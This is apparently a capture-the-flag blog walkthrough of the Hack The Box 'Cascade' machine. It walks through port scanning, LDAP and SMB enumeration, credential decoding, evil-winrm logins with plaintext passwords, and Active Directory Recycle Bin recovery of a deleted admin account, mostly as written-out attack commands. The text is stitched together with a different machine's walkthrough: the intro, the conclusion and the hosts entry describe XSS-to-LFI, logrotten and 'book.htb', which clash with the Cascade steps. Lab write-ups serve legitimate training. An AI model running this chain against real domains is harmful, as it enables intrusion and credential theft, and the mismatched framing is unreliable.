15. HackTheBox. Level Medium: Cascade Walkthrough. LDAP and Remote Active Directory Objects

17 December 2024 5 minutes Author: Lady Liberty

The article provides a step-by-step guide to port scanning, LDAP interaction, password decryption, and recovery of deleted objects. The material is useful for information security professionals who want to improve their pentesting and vulnerability research skills in corporate networks.

Cascade walkthrough

This article covers XSS to LFI exploitation via PDF, privilege escalation using logrotten, and analysis of a logging vulnerability related to field truncation.

The lab is connected via VPN. It is not recommended to use a work computer or host with sensitive data, as the connection is to a private network where users with high skills in information security are present.

Recon

This machine has an IP address of 10.10.10.182, which we add to /etc/hosts.

10.10.10.176	book.htb

First, a scan of open ports is performed. Since scanning all ports with nmap takes a long time, masscan is used for the initial stage. The scan covers all TCP and UDP ports via the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.176     --rate=500

There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.

nmap cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88

First of all, we start with enum4linux enumeration of SMB.

enum4linux -a cascade.htb

We keep a list of users and their group memberships. Let’s see what LDAP has to offer.

Entry Point

We use JXplorer to work with LDAP. Let’s connect and see all the objects.

For user Ryan Thompson, we find the cascadeLegacyPwd attribute.

We decode the base64 and get the password.

USER

Once you have the credentials, you can check the available SMB resources using CrackMapExec.

cme smb cascade.htb -u "r.thompson" -p "rY4n5eva" --shares

Let’s connect to the Data resource.

smbclient -U r.thompson //10.10.10.182/Data

We review everything that is recursive.

Now you should download these files and view their contents.

get "IT\Email Archives\Meeting_Notes_June_2018.html"
get "IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log"
get IT\Logs\DCs\dcdiag.log
get "IT\Temp\s.smith\VNC Install.reg"

The first file talks about network migration and that the TempAdmin password is the same as the regular administrator password.

From the second file, we will note the rights of the ArkSvc user.

There is nothing interesting in the third file. But in the fourth we find the VNC password for the user s.smith.

The password is decoded using vncpasswd. To do this, you need to specify the -d parameter (decode password) and pass it in Hex form.

vncpasswd.py -d -H 6bcf2a4b6e5aca0f

When you look at the enum4linux output, you can see that this user belongs to the Remote Management Users group. This allows you to try to connect to the winrm service using the password you received.
evil-winrm -i cascade.htb -u s.smith -p sT333ve2

USER 2

Let’s look at the SMB resources of this user:

cme smb cascade.htb  -u s.smith -p sT333ve2 --shares

Available resource Audit$

smbclient -U s.smith //10.10.10.182/Audit$

We’ll download everything we have.

Among the downloaded files is a database, by opening it you can click on the credentials in the LDAP table.

However, these credentials do not work, probably because the password is encrypted and decrypted by a special program. Among the available files are CascCrypto.dll, as well as a program that, together with the library, is written in C#.

We decompile the program using dnSpy. We find the section of code where the password is read from the database and passed to the decryption function. This function also passes the key needed to decrypt the password.

By decompiling the library, we learn about the encryption mode and initialization vector.

So, we have the following parameters:

Now you need to decrypt the password. To do this, you can use the CyberChef tool, which allows you to perform the necessary operations online.

Once the password is obtained, we can see from the enum4linux results that this user belongs to the Remote Management Users and AD Recycle Bin groups. As we know, this user played a role for moving objects.

In addition, the TempAdmin user had the same password as the administrator, but his account was deleted.

Now let’s check the deleted objects in the Active Directory Recycle Bin for the possibility of recovering the account or retrieving further data.

Get-ADObject -IncludeDeletedObjects -Filter {IsDeleted -eq $True}

We find the desired object in the Active Directory Recycle Bin. Now we get its attributes for further analysis and possible account recovery.

Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *

Decode the password.

Let’s connect to WinRM and pick up the flag.

evil-winrm -i cascade.htb -u Administrator -p baCT3r1aN00dles

Conclusion

The article examines the process of gaining access to a system through vulnerabilities and subsequent privilege escalation. It shows how to exploit XSS to LFI via PDF, use logrotten to escalate privileges, and investigates issues with field truncation in registration. Special attention is paid to password decryption using CascCrypto.dll and tools such as CyberChef. The final stage was the study of deleted objects in the Active Directory Recycle Bin to restore access.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.